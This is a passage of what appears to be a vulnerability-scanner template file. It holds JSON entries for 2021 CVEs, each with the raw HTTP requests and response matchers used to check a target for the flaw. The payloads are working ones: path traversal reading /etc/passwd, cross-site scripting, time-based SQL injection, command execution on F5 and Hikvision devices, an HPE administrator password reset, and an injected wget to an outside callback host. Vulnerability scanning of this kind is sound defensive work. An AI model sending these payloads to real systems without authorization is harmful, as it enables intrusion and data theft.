{{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["TOTOLINK"]},{"type":"word","part":"header_2","words":["Set-Cookie: SESSION_ID="]},{"type":"status","status":[302]}]}]},{"id":"CVE-2021-39226","info":{"name":"Grafana Snapshot - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/snapshots/:key"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"isSnapshot\":true"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-4191","info":{"name":"GitLab GraphQL API User Enumeration","severity":"medium"},"requests":[{"raw":["POST /api/graphql HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\nAccept: */*\nOrigin: {{RootURL}}\nReferer: {{RootURL}}/-/graphql-explorer\n\n{\"query\":\"# Welcome to GraphiQL\\n#\\n# GraphiQL is an in-browser tool for writing, validating, and\\n# testing GraphQL queries.\\n#\\n# Type queries into this side of the screen, and you will see intelligent\\n# typeaheads aware of the current GraphQL type schema and live syntax and\\n# validation errors highlighted within the text.\\n#\\n# GraphQL queries typically start with a \\\"{\\\" character. Lines that starts\\n# with a # are ignored.\\n#\\n# An example GraphQL query might look like:\\n#\\n#     {\\n#       field(arg: \\\"value\\\") {\\n#         subField\\n#       }\\n#     }\\n#\\n# Keyboard shortcuts:\\n#\\n#  Prettify Query:  Shift-Ctrl-P (or press the prettify button above)\\n#\\n#       Run Query:  Ctrl-Enter (or press the play button above)\\n#\\n#   Auto Complete:  Ctrl-Space (or just start typing)\\n#\\n\\n{\\n  users {\\n    nodes {\\n      id\\n      name\\n      username\\n    }\\n  }\\n}\",\"variables\":null,\"operationName\":null}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"data\"","\"users\"","\"nodes\"","\"id\"","gid://"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"json","json":[".data.users.nodes[].username"]}]}]},{"id":"CVE-2021-21816","info":{"name":"D-Link DIR-3040 1.13B03 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/messages"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["syslog:","admin","/etc_ro/lighttpd/www"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-28377","info":{"name":"Joomla! ChronoForums 2.0.11 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/component/chronoforums2/profiles/avatar/u1?tvout=file&av=../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-29203","info":{"name":"HPE Edgeline Infrastructure Manager <1.22 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["PATCH /redfish/v1/SessionService/ResetPassword/1/ HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json\n\n{\"Password\":\"{{randstr}}\"}\n","POST /redfish/v1/SessionService/Sessions/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"UserName\":\"Administrator\",\"Password\":\"{{randstr}}\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["X-Auth-Token","PasswordReset","Location"],"condition":"and"},{"type":"word","part":"body","words":["Base.1.0.Created"]},{"type":"status","status":[201]}]}]},{"id":"CVE-2021-25067","info":{"name":"Landing Page Builder < 1.4.9.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/edit.php?post_type=ulpb_post&page=page-builder-new-landing-page&thisPostID=test\"+style=animation-name:rotation+onanimationstart=alert(document.domain)+x= HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"test\\\\\\\" style=animation-name:rotation onanimationstart=alert(document.domain)\")","contains(body_2, \"Enter Page Title\")"],"condition":"and"}]}]},{"id":"CVE-2021-24389","info":{"name":"WordPress FoodBakery <2.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/listings/?search_title=&location=&foodbakery_locations_position=filter&search_type=autocomplete&foodbakery_radius=10%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-32618","info":{"name":"Python Flask-Security - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login?next=\\\\\\interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-22122","info":{"name":"FortiWeb - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/error3?msg=30&data=';alert('document.domain');//","{{BaseURL}}/omni_success?cmdb_edit_path=\");alert('document.domain');//"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["alert('document.domain')","No policy has been chosen."],"condition":"and"}]}]},{"id":"CVE-2021-46005","info":{"name":"Sourcecodester Car Rental Management System 1.0 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /admin/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nConnection: close\n\nusername={{username}}&password={{password}}&login=\n","POST /admin/post-avehical.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarypWqYipqU21aYgccv\n\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"vehicletitle\"\n\nTest\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"brandname\"\n\n1\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"vehicalorcview\"\n\n</script><script>alert(document.domain)</script>\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"priceperday\"\n\n500\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"fueltype\"\n\nPetrol\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"modelyear\"\n\n2022\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"seatingcapacity\"\n\n5\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"img1\"; filename=\"test.png\"\nContent-Type: image/png\n\n\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"img2\"; filename=\"test.png\"\nContent-Type: image/png\n\n\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"img3\"; filename=\"test.png\"\nContent-Type: image/png\n\n\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"img4\"; filename=\"test.png\"\nContent-Type: image/png\n\n\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"img5\"; filename=\"\"\nContent-Type: application/octet-stream\n\n\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"submit\"\n\n\n------WebKitFormBoundarypWqYipqU21aYgccv--\n","GET / HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-22986","info":{"name":"F5 iControl REST -  Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /mgmt/shared/authn/login HTTP/1.1\nHost: {{Hostname}}\nAccept-Language: en\nAuthorization: Basic YWRtaW46\nContent-Type: application/json\nCookie: BIGIPAuthCookie=1234\nConnection: close\n\n{\"username\":\"admin\",\"userReference\":{},\"loginReference\":{\"link\":\"http://localhost/mgmt/shared/gossip\"}}\n","POST /mgmt/tm/util/bash HTTP/1.1\nHost: {{Hostname}}\nAccept-Language: en\nX-F5-Auth-Token: {{token}}\nContent-Type: application/json\nConnection: close\n\n{\"command\":\"run\",\"utilCmdArgs\":\"-c id\"}\n"],"matchers":[{"type":"word","words":["commandResult","uid="],"condition":"and"}],"extractors":[{"type":"regex","name":"token","group":1,"regex":["([A-Z0-9]{26})"],"internal":true,"part":"body"},{"type":"regex","group":1,"regex":["\"commandResult\":\"(.*)\""],"part":"body"}]}]},{"id":"CVE-2021-26086","info":{"name":"Atlassian Jira Limited -  Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/s/{{randstr}}/_/;/WEB-INF/web.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<web-app","</web-app>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-26247","info":{"name":"Cacti - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/auth_changepassword.php?ref=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-45092","info":{"name":"Thinfinity Iframe Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/lab.html?vpath=//interact.sh"],"matchers":[{"type":"regex","regex":[".*vpath.*","thinfinity"],"condition":"and"}]}]},{"id":"CVE-2021-32682","info":{"name":"elFinder 2.1.58 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/elfinder/elfinder-cke.html","{{BaseURL}}/assets/backend/elfinder/elfinder-cke.html","{{BaseURL}}/assets/elFinder-2.1.9/elfinder.html","{{BaseURL}}/assets/elFinder/elfinder.html","{{BaseURL}}/backend/elfinder/elfinder-cke.html","{{BaseURL}}/elfinder/elfinder-cke.html","{{BaseURL}}/uploads/assets/backend/elfinder/elfinder-cke.html","{{BaseURL}}/uploads/assets/backend/elfinder/elfinder.html","{{BaseURL}}/uploads/elfinder/elfinder-cke.html"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["elfinder","php/connector"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41293","info":{"name":"ECOA Building Automation System - Arbitrary File Retrieval","severity":"high"},"requests":[{"raw":["POST /viewlog.jsp HTTP/1.1\nHost: {{Hostname}}\n\nyr=2021&mh=6&fname=../../../../../../../../etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-43798","info":{"name":"Grafana v8.x - Arbitrary File Read","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../etc/passwd","{{BaseURL}}/public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../windows/win.ini","{{BaseURL}}/public/plugins/alertlist/../../../../../conf/defaults.ini"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/plain"]},{"type":"regex","regex":["root:.*:0:([0-9]+):","\\/tmp\\/grafana\\.sock","\\[(fonts|extensions|Mail|files)\\]"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24235","info":{"name":"WordPress Goto Tour & Travel Theme <2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/tour-list/?keywords=%3Cinput%2FAutofocus%2F%250D*%2FOnfocus%3Dalert%28123%29%3B%3E&start_date=xxxxxxxxxxxx&avaibility=13"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["input/Autofocus/%0D*/Onfocus=alert(123);","goto-tour-list-js-extra"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-28169","info":{"name":"Eclipse Jetty ConcatServlet - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/static?/%2557EB-INF/web.xml","{{BaseURL}}/concat?/%2557EB-INF/web.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/xml"]},{"type":"word","part":"body","words":["</web-app>","java.sun.com"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41569","info":{"name":"SAS/Internet 9.4 1520 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/broker?csftyp=classic,+ssfile1%3d/etc/passwd&_SERVICE=targetservice&_DEBUG=131&_PROGRAM=sample.webcsf1.sas&sysparm=test&_ENTRY=SAMPLIB.WEBSAMP.PRINT_TO_HTML.SOURCE&BG=%23FFFFFF&DATASET=targetdataset&_DEBUG=131&TEMPFILE=Unknown&style=a+tcolor%3dblue&_WEBOUT=test&bgtype=COLOR"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-36380","info":{"name":"Sunhillo SureLine <8.7.0.1.1 - Unauthenticated OS Command Injection","severity":"critical"},"requests":[{"raw":["POST /cgi/networkDiag.cgi HTTP/1.1\nHost: {{Hostname}}\n\ncommand=2&ipAddr=&dnsAddr=$(wget+http://{{interactsh-url}})&interface=0&netType=0&scrFilter=&dstFilter=&fileSave=false&pcapSave=false&fileSize=\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2021-27319","info":{"name":"Doctor Appointment System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 10s\nPOST /contactus.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nfirstname={{randstr}}&lastname={{randstr}}&email={{randstr}}%40test.com'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&comment={{randstr}}&submit=Send+Us\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 500","contains(body, \"Medical Management System\")"],"condition":"and"}]}]},{"id":"CVE-2021-33807","info":{"name":"Cartadis Gespage 8.2.1 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/gespage/doDownloadData?file_name=../../../../../Windows/debug/NetSetup.log"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["NetpDoDomainJoin:"]},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25008","info":{"name":"The Code Snippets WordPress Plugin < 2.14.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=snippets&snippets-safe-mode%5B0%5D=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29+x%3D HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\" style=animation-name:rotation onanimationstart=alert(document.domain) x","Snippets"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24245","info":{"name":"WordPress Stop Spammers <2021.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP+Cookie+check;\n\nlog=ad%22+accesskey%3DX+onclick%3Dalert%281%29+%22&pwd=&wp-submit=%D9%88%D8%B1%D9%88%D8%AF&redirect_to=http://localhost/wp-admin&testcookie=1\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["ad\" accesskey=X onclick=alert(1)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27651","info":{"name":"Pega Infinity - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/prweb/PRAuth/app/default/"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '< 8.5.2', '>= 8.2.1')"]},{"type":"word","part":"body","words":["Pega Infinity"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["(?m)<span>Pega ([0-9.]+)</span>"],"internal":true},{"type":"regex","group":1,"regex":["(?m)<span>Pega ([0-9.]+)</span>"]}]}]},{"id":"CVE-2021-36260","info":{"name":"Hikvision IP camera/NVR - Remote Command Execution","severity":"critical"},"requests":[{"raw":["PUT /SDK/webLanguage HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\n<?xml version=\"1.0\" encoding=\"UTF-8\"?><language>$(id>webLib/x)</language>\n","GET /x HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_2,'uid=') && contains(body_2,'gid=')","status_code_1 == 500 && status_code_2 == 200"],"condition":"and"}],"extractors":[{"type":"regex","regex":["(u|g)id=.*"]}]}]},{"id":"CVE-2021-24926","info":{"name":"WordPress Domain Check <1.0.17 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=domain-check-profile&domain=test.foo<script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","Domain Check"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-45043","info":{"name":"HD-Network Realtime Monitoring System 2.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET /language/lang HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}\nCookie: s_asptitle=HD-Network%20Real-time%20Monitoring%20System%20V2.0; s_Language=../../../../../../../../../../../../../../etc/passwd; s_browsertype=2; s_ip=; s_port=; s_channum=; s_loginhandle=; s_httpport=; s_sn=; s_type=; s_devtype=\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41192","info":{"name":"Redash Setup Configuration - Default Secrets Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs","{{BaseURL}}/redash/reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Enter your new password:","redash"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24940","info":{"name":"WordPress Persian Woocommerce <=5.8.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=persian-wc&s=xxxxx%22+accesskey%3DX+onclick%3Dalert%281%29+test%3D%22 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(header_2, \"text/html\")","status_code_2 == 200","contains(body_2, 'accesskey=X onclick=alert(1) test=')","contains(body_2, 'woocommerce_persian_translate')"],"condition":"and"}]}]},{"id":"CVE-2021-24210","info":{"name":"WordPress PhastPress <1.111 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/phastpress/phast.php?service=scripts&src=https%3A%2F%2Finteract.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2021-22205","info":{"name":"GitLab CE/EE - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/users/sign_in"],"host-redirects":true,"max-redirects":3,"matchers":[{"type":"word","words":["015d088713b23c749d8be0118caeb21039491d9812c75c913f48d53559ab09df","02aa9533ec4957bb01d206d6eaa51d762c7b7396362f0f7a3b5fb4dd6088745b","051048a171ccf14f73419f46d3bd8204aa3ed585a72924faea0192f53d42cfce","08858ced0ff83694fb12cf155f6d6bf450dcaae7192ea3de8383966993724290","0993beabc8d2bb9e3b8d12d24989426b909921e20e9c6a704de7a5f1dfa93c59","0a5b4edebfcb0a7be64edc06af410a6fbc6e3a65b76592a9f2bcc9afea7eb753","1084266bd81c697b5268b47c76565aa86b821126a6b9fe6ea7b50f64971fc96f","14c313ae08665f7ac748daef8a70010d2ea9b52fd0cae594ffa1ffa5d19c43f4","1626b2999241b5a658bddd1446648ed0b9cc289de4cc6e10f60b39681a0683c4","20f01320ba570c73e01af1a2ceb42987bcb7ac213cc585c187bec2370cf72eb6","27d2c4c4e2fcf6e589e3e1fe85723537333b087003aa4c1d2abcf74d5c899959","292ca64c0c109481b0855aea6b883a588bd293c6807e9493fc3af5a16f37f369","2eaf7e76aa55726cc0419f604e58ee73c5578c02c9e21fdbe7ae887925ea92ae","30a9dffe86b597151eff49443097496f0d1014bb6695a2f69a7c97dc1c27828f","318ee33e5d14035b04832fa07c492cdf57788adda50bb5219ef75b735cbf00e2","33313f1ff2602ef43d945e57e694e747eb00344455ddb9b2544491a3af2696a1","335f8ed58266e502d415f231f6675a32bb35cafcbaa279baa2c0400d4a9872ac","34031b465d912c7d03e815c7cfaff77a3fa7a9c84671bb663026d36b1acd3f86","3407a4fd892e9d5024f3096605eb1e25cad75a8bf847d26740a1e6a77e45b087","340c31a75c5150c5e501ec143849adbed26fed0da5a5ee8c60fb928009ea3b86","38981e26a24308976f3a29d6e5e2beef57c7acda3ad0d5e7f6f149d58fd09d3d","3963d28a20085f0725884e2dbf9b5c62300718aa9c6b4b696c842a3f4cf75fcd","39b154eeefef684cb6d56db45d315f8e9bf1b2cc86cf24d8131c674521f5b514","39fdbd63424a09b5b065a6cc60c9267d3f49950bf1f1a7fd276fe1ece4a35c09","3b51a43178df8b4db108a20e93a428a889c20a9ed5f41067d1a2e8224740838e","3cbf1ae156fa85f16d4ca01321e0965db8cfb9239404aaf52c3cebfc5b4493fb","40d8ac21e0e120f517fbc9a798ecb5caeef5182e01b7e7997aac30213ef367b3","4448d19024d3be03b5ba550b5b02d27f41c4bdba4db950f6f0e7136d820cd9e1","450cbe5102fb0f634c533051d2631578c8a6bae2c4ef1c2e50d4bfd090ce3b54","455d114267e5992b858fb725de1c1ddb83862890fe54436ffea5ff2d2f72edc8","4568941e60dbfda3472e3f745cd4287172d4e6cce44bed85390af9e4e2112d0b","45b2cf643afd34888294a073bf55717ea00860d6a1dca3d301ded1d0040cac44","473ef436c59830298a2424616d002865f17bb5a6e0334d3627affa352a4fc117","4990bb27037f3d5f1bffc0625162173ad8043166a1ae5c8505aabe6384935ce2","4a081f9e3a60a0e580cad484d66fbf5a1505ad313280e96728729069f87f856e","4abc4e078df94075056919bd59aed6e7a0f95067039a8339b8f614924d8cb160","504940239aafa3b3a7b49e592e06a0956ecaab8dbd4a5ea3a8ffd920b85d42eb","52560ba2603619d2ff1447002a60dcb62c7c957451fb820f1894e1ce7c23821c","530a8dd34c18ca91a31fbae2f41d4e66e253db0343681b3c9640766bf70d8edf","5440e2dd89d3c803295cc924699c93eb762e75d42178eb3fe8b42a5093075c71","62e4cc014d9d96f9cbf443186289ffd9c41bdfe951565324891dcf38bcca5a51","64e10bc92a379103a268a90a7863903eacb56843d8990fff8410f9f109c3b87a","655ad8aea57bdaaad10ff208c7f7aa88c9af89a834c0041ffc18c928cc3eab1f","67ac5da9c95d82e894c9efe975335f9e8bdae64967f33652cd9a97b5449216d2","69a1b8e44ba8b277e3c93911be41b0f588ac7275b91a184c6a3f448550ca28ca","6ae610d783ba9a520b82263f49d2907a52090fecb3ac37819cea12b67e6d94fb","70ce56efa7e602d4b127087b0eca064681ecdd49b57d86665da8b081da39408b","7310c45f08c5414036292b0c4026f281a73cf8a01af82a81257dd343f378bbb5","73a21594461cbc9a2fb00fc6f94aec1a33ccf435a7d008d764ddd0482e08fc8d","77566acc818458515231d0a82c131a42890d771ea998b9f578dc38e0eb7e517f","78812856e55613c6803ecb31cc1864b7555bf7f0126d1dfa6f37376d37d3aeab","79837fd1939f90d58cc5a842a81120e8cecbc03484362e88081ebf3b7e3830e9","7b1dcbacca4f585e2cb98f0d48f008acfec617e473ba4fd88de36b946570b8b9","7f1c7b2bfaa6152740d453804e7aa380077636cad101005ed85e70990ec20ec5","81c5f2c7b2c0b0abaeb59585f36904031c21b1702c24349404df52834fbd7ad3","83dc10f687305b22e602ba806619628a90bd4d89be7c626176a0efec173ecff1","93ebf32a4bd988b808c2329308847edd77e752b38becc995970079a6d586c39b","969119f639d0837f445a10ced20d3a82d2ea69d682a4e74f39a48a4e7b443d5e","9b4e140fad97320405244676f1a329679808e02c854077f73422bd8b7797476b","9c095c833db4364caae1659f4e4dcb78da3b5ec5e9a507154832126b0fe0f08e","a0c92bafde7d93e87af3bc2797125cba613018240a9f5305ff949be8a1b16528","a9308f85e95b00007892d451fd9f6beabcd8792b4c5f8cd7524ba7e941d479c9","ac9b38e86b6c87bf8db038ae23da3a5f17a6c391b3a54ad1e727136141a7d4f5","ae0edd232df6f579e19ea52115d35977f8bdbfa9958e0aef2221d62f3a39e7d8","aeddf31361633b3d1196c6483f25c484855e0f243e7f7e62686a4de9e10ec03b","b50bfeb87fe7bb245b31a0423ccfd866ca974bc5943e568ce47efb4cd221d711","b64a1277a08c2901915525143cd0b62d81a37de0a64ec135800f519cb0836445","bb1565ffd7c937bea412482ed9136c6057be50356f1f901379586989b4dfe2ca","be9a23d3021354ec649bc823b23eab01ed235a4eb730fd2f4f7cdb2a6dee453a","bec9544b57b8b2b515e855779735ad31c3eacf65d615b4bfbd574549735111e7","bf1ba5d5d3395adc5bad6f17cc3cb21b3fb29d3e3471a5b260e0bc5ec7a57bc4","bf1c397958ee5114e8f1dadc98fa9c9d7ddb031a4c3c030fa00c315384456218","c8d8d30d89b00098edab024579a3f3c0df2613a29ebcd57cdb9a9062675558e4","c923fa3e71e104d50615978c1ab9fcfccfcbada9e8df638fc27bf4d4eb72d78c","d0850f616c5b4f09a7ff319701bce0460ffc17ca0349ad2cf7808b868688cf71","d161b6e25db66456f8e0603de5132d1ff90f9388d0a0305d2d073a67fd229ddb","d56f0577fbbbd6f159e9be00b274270cb25b60a7809871a6a572783b533f5a3c","d812b9bf6957fafe35951054b9efc5be6b10c204c127aa5a048506218c34e40f","dc6b3e9c0fad345e7c45a569f4c34c3e94730c33743ae8ca055aa6669ad6ac56","def1880ada798c68ee010ba2193f53a2c65a8981871a634ae7e18ccdcd503fa3","e2578590390a9eb10cd65d130e36503fccb40b3921c65c160bb06943b2e3751a","e4b6f040fe2e04c86ed1f969fc72710a844fe30c3501b868cb519d98d1fe3fd0","eb078ffe61726e3898dc9d01ea7955809778bde5be3677d907cbd3b48854e687","ec9dfedd7bd44754668b208858a31b83489d5474f7606294f6cc0128bb218c6d","ed4780bb05c30e3c145419d06ad0ab3f48bd3004a90fb99601f40c5b6e1d90fd","ef53a4f4523a4a0499fb892d9fb5ddb89318538fef33a74ce0bf54d25777ea83","f154ef27cf0f1383ba4ca59531058312b44c84d40938bc8758827023db472812","f7d1309f3caef67cb63bd114c85e73b323a97d145ceca7d6ef3c1c010078c649","f9ab217549b223c55fa310f2007a8f5685f9596c579f5c5526e7dcb204ba0e11"],"condition":"or"}],"extractors":[{"type":"regex","group":1,"regex":["(?:application-)(\\S{64})(?:\\.css)"]}]}]},{"id":"CVE-2021-26084","info":{"name":"Confluence Server - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /{{path}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nqueryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb\n"],"payloads":{"path":["pages/createpage-entervariables.action?SpaceKey=x","pages/createpage-entervariables.action","confluence/pages/createpage-entervariables.action?SpaceKey=x","confluence/pages/createpage-entervariables.action","wiki/pages/createpage-entervariables.action?SpaceKey=x","wiki/pages/createpage-entervariables.action","pages/doenterpagevariables.action","pages/createpage.action?spaceKey=myproj","pages/templates2/viewpagetemplate.action","pages/createpage-entervariables.action","template/custom/content-editor","templates/editor-preload-container","users/user-dark-features"]},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=\"aaaa{140592=null}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27316","info":{"name":"Doctor Appointment System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 10s\nPOST /contactus.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: 